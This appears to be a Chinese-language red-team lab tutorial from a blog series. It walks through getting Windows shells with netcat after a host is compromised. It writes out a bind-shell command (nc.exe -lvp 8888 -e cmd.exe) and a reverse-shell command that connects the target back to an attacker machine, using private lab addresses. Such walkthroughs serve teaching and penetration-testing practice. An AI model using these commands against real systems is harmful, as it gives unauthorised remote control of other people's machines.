目录
一.利用NC工具在windows系统执行反弹shell
1. Windows正向连接shell
2.Windows反向连接shell
前文推荐:
- 《红蓝攻防对抗实战》一. 隧道穿透技术详解
- 《红蓝攻防对抗实战》二.内网探测协议出网之TCP/UDP协议探测出网
- 《红蓝攻防对抗实战》三.内网探测协议出网之HTTP/HTTPS协议探测出网
- 《红蓝攻防对抗实战》四.内网探测协议出网之ICMP协议探测出网
- 《红蓝攻防对抗实战》五.内网探测协议出网之DNS协议探测出网
假设在内网环境中发现主机,通过漏洞获取到该主机控制权限,想要进一步对内网环境进行后续利用,这里可以通过反弹shell的方式去进行穿透,本次实验以nc工具为例来演示不同系统的操作,实验拓扑如图1-1所示。
一.利用NC工具在windows系统执行反弹shell
图1-1 windows系统下实验拓扑图
1. Windows正向连接shell
本次实验环境如图1-1所示,假设已经获取到目标服务器的系统权限,上传nc工具,使用正向连接反弹shell的方法将目标服务器的shell反弹到本地主机。
1)首先在目标服务器执行nc.exe -lvp 8888 -e cmd.exe命令监听8888端口,使用-e参数将cmd.exe程序反弹连接到此端口的服务,开启监听执行成功后如图1-2所示。
图1-2 服务器开启监听
2)目标服务器执行监听后,在本地主机执行nc.exe 192.168.0.3 8888命令去连接目标服务器nc开启监听的端口,连接成功即可获取到目标服务器的shell权限,如图1-3所示。
图1-3 windwos主机获取反弹shell
2.Windows反向连接shell
本次实验环境如图1-1所示,在目标服务器允许出网的情况下,在本地主机上获取到目标服务器的shell权限,可以尝试使用反向连接的方法。
1)首先在本地主机中使用nc工具开启监听,执行nc.exe -lvp 8888命令,如图1-4所示。
图1-4 windows主机开启服务端监听
2)当本地主机开启监听后,在目标服务器执行nc.exe 192.168.0.2 8888 -e cmd"命令主动连接本地主机的8888端口将cmd命令反弹到目标服务器,如图1-5所示
图1-5 服务器连接主机
3)此时当目标服务器访问我们的本地8888端口时,即可执行获取到目标服务器的Shell权限,使用Ipconfig命令查看获取到的反弹shell的IP,可查看到是目标服务器,如图1-6所示。
图1-6 获取服务器反弹shell的IP